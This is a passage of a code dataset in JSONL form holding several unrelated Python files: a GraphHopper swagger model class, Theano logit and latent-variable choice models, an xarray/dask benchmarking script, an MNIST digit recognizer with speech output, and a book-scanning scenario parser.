CreatorOfPython.gosterGrafik_buyukHarf()\r\n continue\r\n elif selection == 0:\r\n print(CreatorOfPython)\r\n continue","repo_name":"dataCalculus/stringAnalysisProject","sub_path":"harfAnalizi_4_pyplot.py","file_name":"harfAnalizi_4_pyplot.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17863040715","text":"# coding: utf-8\n\n\"\"\"\n GraphHopper Directions API\n\n You use the GraphHopper Directions API to add route planning, navigation and route optimization to your software. E.g. the Routing API has turn instructions and elevation data and the Route Optimization API solves your logistic problems and supports various constraints like time window and capacity restrictions. Also it is possible to get all distances between all locations with our fast Matrix API. # noqa: E501\n\n OpenAPI spec version: 1.0.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom swagger_client.models.address import Address # noqa: F401,E501\nfrom swagger_client.models.time_window import TimeWindow # noqa: F401,E501\n\n\nclass Stop(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'address': 'Address',\n 'duration': 'int',\n 'preparation_time': 'int',\n 'time_windows': 'list[TimeWindow]'\n }\n\n attribute_map = {\n 'address': 'address',\n 'duration': 'duration',\n 'preparation_time': 'preparation_time',\n 'time_windows': 'time_windows'\n }\n\n def __init__(self, address=None, duration=None, preparation_time=None, time_windows=None): # noqa: E501\n \"\"\"Stop - a model defined in Swagger\"\"\" # noqa: E501\n\n self._address = None\n self._duration = None\n self._preparation_time = None\n self._time_windows = None\n self.discriminator = None\n\n if address is not None:\n self.address = address\n if duration is not None:\n self.duration = duration\n if preparation_time is not None:\n self.preparation_time = preparation_time\n if time_windows is not None:\n self.time_windows = time_windows\n\n @property\n def address(self):\n \"\"\"Gets the address of this Stop. # noqa: E501\n\n\n :return: The address of this Stop. # noqa: E501\n :rtype: Address\n \"\"\"\n return self._address\n\n @address.setter\n def address(self, address):\n \"\"\"Sets the address of this Stop.\n\n\n :param address: The address of this Stop. # noqa: E501\n :type: Address\n \"\"\"\n\n self._address = address\n\n @property\n def duration(self):\n \"\"\"Gets the duration of this Stop. # noqa: E501\n\n duration of stop, i.e. time in seconds the corresponding activity takes # noqa: E501\n\n :return: The duration of this Stop. # noqa: E501\n :rtype: int\n \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n \"\"\"Sets the duration of this Stop.\n\n duration of stop, i.e. time in seconds the corresponding activity takes # noqa: E501\n\n :param duration: The duration of this Stop. # noqa: E501\n :type: int\n \"\"\"\n\n self._duration = duration\n\n @property\n def preparation_time(self):\n \"\"\"Gets the preparation_time of this Stop. # noqa: E501\n\n preparation time of service, e.g. search for a parking space. it only falls due if the location of previous activity differs from this location # noqa: E501\n\n :return: The preparation_time of this Stop. # noqa: E501\n :rtype: int\n \"\"\"\n return self._preparation_time\n\n @preparation_time.setter\n def preparation_time(self, preparation_time):\n \"\"\"Sets the preparation_time of this Stop.\n\n preparation time of service, e.g. search for a parking space. it only falls due if the location of previous activity differs from this location # noqa: E501\n\n :param preparation_time: The preparation_time of this Stop. # noqa: E501\n :type: int\n \"\"\"\n\n self._preparation_time = preparation_time\n\n @property\n def time_windows(self):\n \"\"\"Gets the time_windows of this Stop. # noqa: E501\n\n array of time windows. currently, only a single time window is allowed # noqa: E501\n\n :return: The time_windows of this Stop. # noqa: E501\n :rtype: list[TimeWindow]\n \"\"\"\n return self._time_windows\n\n @time_windows.setter\n def time_windows(self, time_windows):\n \"\"\"Sets the time_windows of this Stop.\n\n array of time windows. currently, only a single time window is allowed # noqa: E501\n\n :param time_windows: The time_windows of this Stop. # noqa: E501\n :type: list[TimeWindow]\n \"\"\"\n\n self._time_windows = time_windows\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, Stop):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"byung90/graphhopper","sub_path":"python/swagger_client/models/stop.py","file_name":"stop.py","file_ext":"py","file_size_in_byte":6236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21546861170","text":"import numpy as np\nimport theano\nimport theano.tensor as T\nfrom theano import shared\n\nfloatX = theano.config.floatX\nnp.random.seed(42)\n\n\ndef softmax(x, av):\n\t# logitistic probability\n\te_x = av * T.exp(x - x.max(axis=-1, keepdims=True))\n\treturn e_x / e_x.sum(axis=-1, keepdims=True)\n\n\nclass Logistic(object):\n\t\"\"\" Simple discrete choice model\n\t\tThis module provides a simple softmax function on both generic\n\t\tand non-generic inputs\n\n\t\tconditional logit: U = B_i * x_im + c_i\n\t\tmultinomial logit: U = B_im * x_m + c_i\n\n\t\"\"\"\n\n\tdef __init__(self, n_out, av,\n\t\t\t\t n_in=[None, None], input=[None, None]):\n\t\t\"\"\"\n\t\tParameters\n\t\t----------\n\t\t:int n_out: size of output vectors (number of alternatives)\n\t\t:tensor av: symbolic tensor referencing to the availability of the\n\t\t\t\t\talternatives\n\t\t:list[tensor] input: non-generic and generic input variables\n\t\t:list[int] n_in: size of parameters corresponding to non-generic and\n\t\t\t\t\t\t generic inputs.\n\n\t\t\"\"\"\n\t\tself.params = []\n\t\tself.masks = []\n\n\t\tself.c = shared(\n\t\t\tnp.zeros((n_out,), dtype=floatX),\n\t\t\tname='c', borrow=True)\n\n\t\tself.params.extend([self.c])\n\n\t\tself.c_mask = np.ones((n_out,), dtype=np.bool)\n\t\tself.c_mask[-1] = 0\n\n\t\tself.masks.extend([shared(self.c_mask)])\n\n\t\tif n_in[0] is not None:\n\t\t\tself.B = shared(\n\t\t\t\tnp.zeros(np.prod(n_in[0]), dtype=floatX),\n\t\t\t\tname='B', borrow=True)\n\n\t\t\tself.params.extend([self.B])\n\n\t\t\tself.B_mask = np.ones(np.prod(n_in[0]), dtype=np.bool)\n\n\t\t\tself.masks.extend([shared(self.B_mask)])\n\n\t\tif n_in[1] is not None:\n\t\t\tself.D = shared(\n\t\t\t\tnp.zeros(np.prod(n_in[1]), dtype=floatX),\n\t\t\t\tname='D', borrow=True)\n\t\t\tself.D_mat = self.D.reshape(n_in[1])\n\n\t\t\tself.params.extend([self.D])\n\n\t\t\tself.D_mask = np.ones(n_in[1], dtype=np.bool)\n\t\t\tself.D_mask[:, -1] = 0\n\n\t\t\tself.masks.extend([shared(self.D_mask.flatten())])\n\n\t\t# utility equation\n\t\tv = (\n\t\t\tT.dot(input[0], self.B)\n\t\t\t+ T.dot(input[1], self.D_mat)\n\t\t\t+ self.c)\n\n\t\t# estimate a logit model given availability conditions\n\t\tself.p_y_given_x = T.clip(softmax(v, av), 1e-8, 1.0)\n\n\t\t# prediction given choices\n\t\tself.y_pred = T.argmax(self.p_y_given_x, axis=-1)\n\n\tdef loglikelihood(self, y):\n\t\t# loglikelihood sum\n\t\treturn T.sum(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])\n\n\tdef errors(self, y):\n\t\t# returns the number of errors as a percentage of total number of examples\n\t\treturn T.mean(T.neq(self.y_pred, y))\n\n\nclass MixedLogit(object):\n\t\"\"\" Mixed Logit by simulation\n\t\tThis module provides a simple softmax function on both generic\n\t\tand non-generic inputs\n\n\t\tconditional logit: U = B_i * x_im + c_i\n\t\tmultinomial logit: U = B_im * x_m + c_i\n\n\t\"\"\"\n\n\tdef __init__(self, n_out, av,\n\t\t\t n_in=[None, None], input=[None, None],\n\t\t\t\t draws=None):\n\t\t\"\"\"\n\t\tParameters\n\t\t----------\n\t\t:RandomStream draws: RandomStream of normal draws\n\t\t:int n_out: size of output vectors (number of alternatives)\n\t\t:tensor av: symbolic tensor referencing to the availability of the\n\t\t\t\t\talternatives\n\t\t:list[tensor] input: non-generic and generic input variables\n\t\t:list[int] n_in: size of parameters corresponding to non-generic and\n\t\t\t\t\t\tgeneric inputs.\n\n\t\t\"\"\"\n\t\tself.draws = draws\n\t\tself.params = []\n\t\tself.masks = []\n\n\t\tself.c = shared(\n\t\t\tnp.zeros((n_out,), dtype=floatX),\n\t\t\tname='c', borrow=True)\n\n\t\tself.params.extend([self.c])\n\n\t\tself.c_mask = np.ones((n_out,), dtype=np.bool)\n\t\tself.c_mask[-1] = 0\n\n\t\tself.masks.extend([shared(self.c_mask)])\n\n\t\tif n_in[0] is not None:\n\t\t\tself.B = shared(\n\t\t\t\tnp.zeros(np.prod(n_in[0]), dtype=floatX),\n\t\t\t\tname='B', borrow=True)\n\n\t\t\tself.params.extend([self.B])\n\n\t\t\tself.B_mask = np.ones(np.prod(n_in[0]), dtype=np.bool)\n\n\t\t\tself.masks.extend([shared(self.B_mask)])\n\n\t\t\tself.B_s = shared(\n\t\t\t\tnp.zeros(np.prod(n_in[0]), dtype=floatX),\n\t\t\t\tname='B_s', borrow=True)\n\n\t\t\tself.params.extend([self.B_s])\n\n\t\t\tself.B_s_mask = np.ones(np.prod(n_in[0]), dtype=np.bool)\n\n\t\t\tself.masks.extend([shared(self.B_s_mask)])\n\n\t\tif n_in[1] is not None:\n\t\t\tself.D = shared(\n\t\t\t\tnp.zeros(np.prod(n_in[1]), dtype=floatX),\n\t\t\t\tname='D', borrow=True)\n\t\t\tself.D_mat = self.D.reshape(n_in[1])\n\n\t\t\tself.params.extend([self.D])\n\n\t\t\tself.D_mask = np.ones(n_in[1], dtype=np.bool)\n\t\t\tself.D_mask[:, -1] = 0\n\n\t\t\tself.masks.extend([shared(self.D_mask.flatten())])\n\n\t\t# utility equation\n\t\tself.B_RND = self.B + (self.B_s * draws)\n\n\t\tv = (\n\t\t\tT.batched_tensordot(\n\t\t\t\tinput[0], self.B_RND, axes=[[2], [2]]).dimshuffle(2, 0, 1)\n\t\t\t+ T.dot(input[1], self.D_mat)\n\t\t\t+ self.c)\n\n\t\t# estimate a logit model given availability conditions\n\t\tself.p_y_given_x = T.mean(\n\t\t\tT.clip(softmax(v, av), 1e-8, 1.0), axis=0)\n\n\t\t# prediction given choices\n\t\tself.y_pred = T.argmax(self.p_y_given_x, axis=-1)\n\n\tdef loglikelihood(self, y):\n\t\t# loglikelihood sum\n\t\treturn T.sum(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])\n\n\tdef errors(self, y):\n\t\t# returns the number of errors as a percentage of total number of examples\n\t\treturn T.mean(T.neq(self.y_pred, y))\n\n\nclass ICLV(object):\n\t\"\"\" An intergrated choice and latent variable model\n\t\tgeneric observed variables are used as inputs for the\n\t\tlatent variables.\n\n\t\tThe choice model consists of alternative specific\n\t\tvariables and generic latent variables.\n\n\t\tIndicator outputs are binary valued [0,1], and a non-\n\t\tlinear transform of latent variables is performed using\n\t\tthe sigmoid() function\n\n\t\tThe loss function is comprised of the loglikelihood given the\n\t\talternative specific variables and latent variables with\n\t\tthe cross entropy of the indicators given the latent variables\n\n\t\tLatent variable: x_star_h = G_hm * x_m + g_h\n\t\tIndicators: I_p = A_ph * x_star_h + j_p\n\t\t\t\t\tP(I|x_star) = sigmoid(I_p)\n\t\tChoice utility: U = B_i * x_im + D_ih * x_star_h + c_i\n\t\t\t\t\t\tP(y|x,x_star) = softmax(U, av)\n\t\tloss fn: sum(log(P(y|x,x_star))) + sum(log(P(I|x_star))) +\n\t\t\t\t\tsum(cross_entropy(z, P(I|x_star)))\n\n\t\tcross_entropy(z,p): sum(z*log(p) + (1-z)*log(1-p), axis=-1)\n\n\t\"\"\"\n\n\tdef __init__(self, n_out, av,\n\t\t\t\t n_in=[None, None], n_hid=[None, None, None], n_ind=[None],\n\t\t\t\t input=[None, None], output=None):\n\t\t\"\"\"\n\t\tParameters\n\t\t----------\n\t\t:int n_out: size of output vectors (number of alternatives)\n\t\t:tensor av: symbolic tensor referencing to the availability of the\n\t\t\t\t\talternatives\n\t\t:list[tensor] input: non-generic and generic input variables\n\t\t:list[int] n_in: size of parameters corresponding to non-generic and\n\t\t\t\t\t\t generic inputs.\n\n\t\t\"\"\"\n\t\tself.params = []\n\t\tself.masks = []\n\n\t\tself.c_i = shared(\n\t\t\tnp.zeros((n_out,), dtype=floatX), name='c_i', borrow=True)\n\n\t\tself.params.extend([self.c_i]) # Alternative specific constants\n\n\t\tself.c_mask = np.ones((n_out,), dtype=np.bool)\n\t\tself.c_mask[-1] = 0\n\n\t\tself.masks.extend([shared(self.c_mask)])\n\n\t\tself.B = shared(\n\t\t\tnp.zeros(np.prod(n_in[0]), dtype=floatX), name='B', borrow=True)\n\n\t\tself.params.extend([self.B]) # Generic parameters (cost, time, etc.)\n\n\t\tself.B_mask = np.ones(np.prod(n_in[0]), dtype=np.bool)\n\n\t\tself.masks.extend([shared(self.B_mask)])\n\n\t\tself.G_mask = np.ones(np.prod(n_in[1]), dtype=np.bool)\n\t\t#self.G_mask[:, -1] = 0\n\t\t# self.G_mask[[5, 8, 12, 14, 15, 18, 19, 20, 27, 30, 31, 32, 33, 34, 35, 36, 38, 39, 41, 44, 47, 48, 50, 51, 53, 56, 59]] = 0\n\n\t\tself.masks.extend([shared(self.G_mask.flatten())])\n\n\t\tself.G = shared(\n\t\t\tnp.random.uniform(-1., 1., np.prod(n_in[1]))*self.G_mask.flatten(),\n\t\t\tname='G', borrow=True)\n\t\tself.G_mat = self.G.reshape(n_in[1])\n\n\t\tself.params.extend([self.G]) # Latent variable parameters\n\n\t\t# self.c_h = shared(\n\t\t# \tnp.zeros(n_hid[0], dtype=floatX), name='c_h', borrow=True)\n\t\t#\n\t\t# self.params.extend([self.c_h]) # Latent variable constants\n\t\t#\n\t\t# self.c_h_mask = np.ones(n_hid[0], dtype=np.bool)\n\t\t# self.c_h_mask[-1] = 0\n\t\t#\n\t\t# self.masks.extend([shared(self.c_h_mask)])\n\n\t\tself.A = shared(\n\t\t\tnp.zeros(np.prod(n_hid[1]), dtype=floatX), name='A', borrow=True)\n\t\tself.A_mat = self.A.reshape(n_hid[1]) # Indicator variables\n\n\t\tself.params.extend([self.A])\n\n\t\tself.A_mask = np.ones(np.prod(n_hid[1]), dtype=np.bool)\n\t\t# self.A_mask[:, -1] = 0\n\t\tself.A_mask[[0,1,2,3, 4,5,6,7,\n\t\t\t\t\t 16,17,18,19, 20,21,22,23,\n\t\t\t\t\t 24,25,26,27, 32,33,34,35]] = 0\n\n\t\tself.masks.extend([shared(self.A_mask.flatten())])\n\n\t\t# self.c_z = shared(\n\t\t# \tnp.zeros(n_ind[0], dtype=floatX), name='c_z', borrow=True)\n\t\t#\n\t\t# self.params.extend([self.c_z]) # Indicator constants\n\t\t#\n\t\t# self.c_z_mask = np.ones(n_ind[0], dtype=np.bool)\n\t\t# self.c_z_mask[-1] = 0\n\t\t#\n\t\t# self.masks.extend([shared(self.c_z_mask)])\n\n\t\tself.D = shared(\n\t\t\tnp.zeros(np.prod(n_hid[2]), dtype=floatX), name='D', borrow=True)\n\t\tself.D_mat = self.D.reshape(n_hid[2])\n\n\t\tself.params.extend([self.D]) # Alternative specific params (Latent)\n\n\t\tself.D_mask = np.ones(n_hid[2], dtype=np.bool)\n\t\tself.D_mask[:, -1] = 0\n\n\t\tself.masks.extend([shared(self.D_mask.flatten())])\n\n\t\t# latent variable equation\n\t\tx_h = T.nnet.sigmoid(T.dot(input[1], self.G_mat))\n\t\t# x_h = T.tanh(T.dot(input[1], self.G_mat) + self.c_h)\n\t\t# x_h = T.dot(input[1], self.G_mat) + self.c_h\n\n\t\t# Indicator equation\n\t\tind = T.dot(x_h, self.A_mat)\n\n\t\t# utility equation\n\t\tv = (T.dot(input[0], self.B)\n\t\t\t + T.dot(x_h, self.D_mat)\n\t\t\t + self.c_i)\n\n\t\t# estimate the indicator measurement model\n\t\tself.p_z_given_x_h = T.clip(T.nnet.sigmoid(ind), 1e-8, 1.0 - 1e-8)\n\n\t\t# estimate a logit model given availability conditions\n\t\tself.p_y_given_x = T.clip(softmax(v, av), 1e-8, 1.0)\n\n\t\t# prediction given choices\n\t\tself.y_pred = T.argmax(self.p_y_given_x, axis=-1)\n\n\t\t# keep track of input\n\t\tself.x_ng = input[0]\n\t\tself.x_g = input[1]\n\t\tself.av = av\n\t\tself.y = output\n\n\tdef loglikelihood(self, y):\n\t\t# loglikelihood sum\n\t\treturn T.sum(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])\n\n\tdef cross_entropy(self, z):\n\t\t# cross entropy loss cross_entropy(z,p):\n\t\t# sum(z*log(p) + (1-z)*log(1-p), axis=-1)\n\t\treturn T.sum(\n\t\t\tz * T.log(self.p_z_given_x_h)\n\t\t\t+ (1 - z) * T.log(1 - self.p_z_given_x_h))\n\n\tdef errors(self, y):\n\t\t# returns the number of errors as a percentage of total number of examples\n\t\treturn T.mean(T.neq(self.y_pred, y))\n","repo_name":"LiTrans/ICLV-RBM","sub_path":"models/rum.py","file_name":"rum.py","file_ext":"py","file_size_in_byte":9915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71744460667","text":"import numpy as np\n\n#taking row and coloumn input from user\nrow = int(input(\"Enter No. Of Rows\"))\ncols = int(input(\"Enter No. Of Coloumns\"))\n\n#setting range for \"FOR\"\nf = max(row,cols)\nfor i in range(1,f+1):\n#Printing zero matrices for the results thus obtained\n if row%i==0 and cols%i==0:\n print(np.zeros((i,i)))\n","repo_name":"Anirudhsh/MLassignments","sub_path":"checkrc.py","file_name":"checkrc.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36849555673","text":"import os\nimport sys\n\nsys.path.append(\"../\")\nimport os\n\nos.chdir(\"/home/ghiggi/Projects/deepsphere-weather\")\nimport time\nimport xarray as xr\n\n# from multiprocessing import Pool\nfrom functools import partial\nfrom dask.distributed import Client, LocalCluster\n\n\nfrom modules.xscaler import GlobalStandardScaler\nfrom modules.xscaler import GlobalMinMaxScaler\nfrom modules.xscaler import AnomalyScaler\nfrom modules.xscaler import Climatology\n\nbase_data_dir = \"/ltenas3/DeepSphere/data/preprocessed/ERA5_HRES/\"\nsampling_name = \"O24\"\ndata_dir = os.path.join(base_data_dir, sampling_name)\nprint(\"Data directory:\", data_dir)\n##------------------------------------------------------------------------.\n### Load data\n# - Define path for dynamic data (i.e. pressure and surface levels variables)\ndynamic_fpath = os.path.join(\n data_dir, \"Data\", \"dynamic\", \"space_chunked\", \"dynamic.zarr\"\n)\n# dynamic_fpath = os.path.join(data_dir, \"Data\",\"dynamic\", \"time_chunked\", \"dynamic.zarr\")\n# - Define path for boundary conditions data (i.e. TOA)\nbc_fpath = os.path.join(data_dir, \"Data\", \"bc\", \"space_chunked\", \"bc.zarr\")\n# bc_fpath = os.path.join(data_dir, \"Data\",\"bc\", \"time_chunked\", \"bc.zarr\")\n\n##------------------------------------------------------------------------------.\n### Benchmark reaading data\n# --> Dask rechunking helps a lot for performance !!!\n\n# - Define dask chunks\nnode_dask_chunks = 200\nn_feature = 2\nn_node = node_dask_chunks * 30\n\ndask_chunks = {\n \"feature\": 1, # each single feature\n \"time\": -1, # all across time\n \"node\": node_dask_chunks, # 2.73 MB per disk chunk --> 1092 MB each chunk\n}\n# - Without dask rechunking\nda_dynamic = xr.open_zarr(dynamic_fpath)[\"data\"]\nda_dynamic = da_dynamic.isel(node=slice(0, n_node)).isel(feature=slice(0, 5))\nda_orig = da_dynamic\nt_i = time.time()\nb = da_orig.compute()\nprint(\"- Oring Elapsed time: {:.2f}s\".format((time.time() - t_i)))\ndel da_dynamic\ndel b\n\n# - With dask rechunking\nda_dynamic = xr.open_zarr(dynamic_fpath)[\"data\"]\nda_dynamic = da_dynamic.isel(node=slice(0, n_node)).isel(feature=slice(0, n_feature))\nda_rechunked = da_dynamic.chunk(dask_chunks)\nt_i = time.time()\na = da_rechunked.compute()\nprint(\"- Rechunked Elapsed time: {:.2f}s\".format((time.time() - t_i)))\ndel da_dynamic\ndel a\n\nda_rechunked\nda_orig\n\n##------------------------------------------------------------------------------.\n# Benchmark to_dataset() use\nnode_dask_chunks = 200\nn_feature = 8\nn_node = node_dask_chunks * 30\n\ndask_chunks = {\n \"feature\": 1, # each single feature\n \"time\": -1, # all across time\n \"node\": node_dask_chunks, # 2.73 MB per disk chunk --> 1092 MB each chunk\n}\n\nda_dynamic = xr.open_zarr(dynamic_fpath)[\"data\"]\n# da_dynamic = da_dynamic.isel(node=slice(0,n_node)).isel(feature=slice(0,n_feature))\nda_rechunked = da_dynamic.chunk(dask_chunks)\nt_i = time.time()\nb = da_rechunked.max(\"feature\").compute() # 380 s , 155s\nprint(\"- DataArray Elapsed time: {:.2f}s\".format((time.time() - t_i)))\ndel da_dynamic\ndel da_rechunked\ndel b\n\nda_dynamic = xr.open_zarr(dynamic_fpath)[\"data\"]\n# da_dynamic = da_dynamic.isel(node=slice(0,n_node)).isel(feature=slice(0,n_feature))\nda_rechunked = da_dynamic.chunk(dask_chunks)\nds_rechunked = da_rechunked.to_dataset(\"feature\")\nt_i = time.time()\na = ds_rechunked.max().compute() # 77 s, 83 s\nprint(\"- Dataset Elapsed time: {:.2f}s\".format((time.time() - t_i)))\ndel da_dynamic\ndel da_rechunked\ndel a\n\n##------------------------------------------------------------------------------.\n## Graph viz\nda_dynamic = xr.open_zarr(dynamic_fpath)[\"data\"]\nda_dynamic = da_dynamic.isel(node=slice(0, 10)).isel(feature=slice(0, 5))\nda_dynamic = da_dynamic.compute()\ndask_chunks = {\n \"feature\": 1, # each single feature\n \"time\": -1, # all across time\n \"node\": 2, # 2.73 MB per disk chunk --> 1092 MB each chunk\n}\nda_rechunked = da_dynamic.chunk(dask_chunks)\n\n\nda_rechunked.data.visualize()\nds = da_rechunked.to_dataset(\"feature\")\nds.mean().data.visualize()\n","repo_name":"deepsphere/deepsphere-weather","sub_path":"dev/dev_scalers.py","file_name":"dev_scalers.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"6"} +{"seq_id":"12706864809","text":"from tensorflow import keras\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport cv2\r\nfrom gtts import gTTS\r\nimport os\r\n\r\n# Load your trained model for handwritten digit recognition\r\nmodel = keras.models.load_model('mnist_1.h5') #trained mnist dataset using cnn reacher#1\r\n\r\n\r\ndef recognize_digit_from_image(image_path):\r\n # Load and preprocess the image\r\n img = Image.open(image_path).convert('L') # Convert to grayscale\r\n img = img.resize((28, 28)) #img = img.resize((28, 28))\r\n img_array = np.array(img)\r\n img_array = img_array / 255.0 # Normalize the pixel values\r\n img_array = img_array.reshape(1, 28, 28)\r\n\r\n # Make a prediction using the model\r\n prediction = model.predict(img_array)\r\n predicted_digit = np.argmax(prediction)\r\n\r\n # Convert the predicted digit to speech\r\n text_to_speech = f\"The predicted digit is {predicted_digit}\"\r\n tts = gTTS(text_to_speech)\r\n\r\n # Save the speech output as an audio file\r\n tts.save(\"predicted_digit_output.mp3\")\r\n\r\n # Display the image with the recognized digit\r\n img_with_text = np.array(img.convert('RGB'))\r\n cv2.putText(img_with_text, f'Predicted Digit: {predicted_digit}', (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1,\r\n (0, 255, 0), 2)\r\n cv2.imshow('Handwritten Digit Recognition', img_with_text)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\n # Play the audio file\r\n os.system(\" predicted_digit_output.mp3\") # to save the output as audio file\r\n\r\n\r\n# Usage\r\nimage_path = 'sample_5.png'\r\nrecognize_digit_from_image(image_path)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n'''import tensorflow as tf\r\nimport cv2\r\nimport numpy as np\r\nimport pyttsx3\r\nimport matplotlib.pyplot as plt\r\n\r\n# Load the pre-trained model\r\nmodel = tf.keras.models.load_model('mnist_2.h5')\r\n\r\nimage = cv2.imread('img_data_mini.jpg')\r\ngrey = cv2.cvtColor(image.copy(), cv2.COLOR_BGR2GRAY)\r\nret, thresh = cv2.threshold(grey.copy(), 75, 255, cv2.THRESH_BINARY_INV)\r\ncontours, _ = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\npreprocessed_digits = []\r\nfor c in contours:\r\n x, y, w, h = cv2.boundingRect(c)\r\n\r\n # Creating a rectangle around the digit in the original image (for displaying the digits fetched via contours)\r\n cv2.rectangle(image, (x, y), (x + w, y + h), color=(0, 255, 0), thickness=2)\r\n\r\n # Cropping out the digit from the image corresponding to the current contours in the for loop\r\n digit = thresh[y:y + h, x:x + w]\r\n\r\n # Resizing that digit to (18, 18)\r\n resized_digit = cv2.resize(digit, (18, 18))\r\n\r\n # Padding the digit with 5 pixels of black color (zeros) in each side to finally produce the image of (28, 28)\r\n padded_digit = np.pad(resized_digit, ((5, 5), (5, 5)), 'constant', constant_values=0)\r\n\r\n # Adding the preprocessed digit to the list of preprocessed digits\r\n preprocessed_digits.append(padded_digit)\r\nprint(\"\\n\\n\\n----------------Contoured Image--------------------\")\r\nplt.imshow(image, cmap=\"gray\")\r\nplt.show()\r\n\r\ninp = np.array(preprocessed_digits)\r\n\r\n##\r\n\r\nfor digit in preprocessed_digits:\r\n prediction = model.predict(digit.reshape(1, 28, 28, 1))\r\n\r\n print(\"\\n\\n---------------------------------------\\n\\n\")\r\n print(\"=========PREDICTION============ \\n\\n\")\r\n plt.imshow(digit.reshape(28, 28), cmap=\"gray\")\r\n plt.show()\r\n digit=(print(\"\\n\\nFinal Output: {}\".format(np.argmax(prediction))))\r\n\r\n\r\n # Generate voice output\r\nengine = pyttsx3.init()\r\nengine.say(f\"The recognized digit is {digit}\")\r\nengine.runAndWait()\r\n\r\n# Load an image\r\n#image_path = 'img_data_mini.jpg'\r\n#image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)\r\n\r\n# Resize the image to (28, 28)\r\n#image = cv2.resize(image, (28, 28))\r\n\r\n# Expand dimensions to (28, 28, 1)\r\n#image = np.expand_dims(image, axis=-1)\r\n\r\n# Normalize pixel values to be between 0 and 1\r\n#image = image / 255.0\r\n\r\n# Make a prediction\r\n#predictions = model.predict(np.expand_dims(image, axis=0))\r\n#digit = np.argmax(predictions[0])'''\r\n","repo_name":"Krishna2912/DIGIT_RECOG","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72486312507","text":"from os import listdir\nfrom os.path import isfile, join\n\nfrom objects import *\nfrom simulate import *\n\ndays_left = -1\n\ndef parse(handle):\n lines = handle.readlines()\n \n header = lines[0].split(\" \")\n total_books = int(header[0])\n total_libraries = int(header[1])\n total_days = int(header[2])\n\n books = lines[1].split(\" \")\n books = [int(s) for s in books]\n books = [Book(i, score) for (i, score) in enumerate(books)]\n\n if total_books != len(books):\n print(\"WARN: total_books(\" + str(total_books) + \") does not match len(books)(\" + str(len(books)) + \")\")\n\n libraries = []\n library_index = 0\n for i in range(2, len(lines) - 1, 2):\n metadata = lines[i].split(\" \")\n num_books = int(metadata[0])\n signup_time = int(metadata[1])\n max_per_day = int(metadata[2])\n \n library_books = [int(i) for i in lines[i+1].split(\" \")]\n library_books = [books[i] for i in library_books]\n library = Library(library_index, library_books, signup_time, max_per_day)\n \n library_index += 1\n libraries.append(library)\n\n if total_libraries != len(libraries):\n print(\"WARN: total_libraries(\" + str(total_libraries) + \") does not match len(libraries)(\" + str(len(libraries)) + \")\")\n\n #print(\"Loaded \" + str(len(books)) + \" books\")\n #print(\"Loaded \" + str(len(libraries)) + \" libraries\")\n print(\"Scenario will last \" + str(total_days) + \" days\")\n\n return Scenario(libraries, books, total_days)\n\ndef 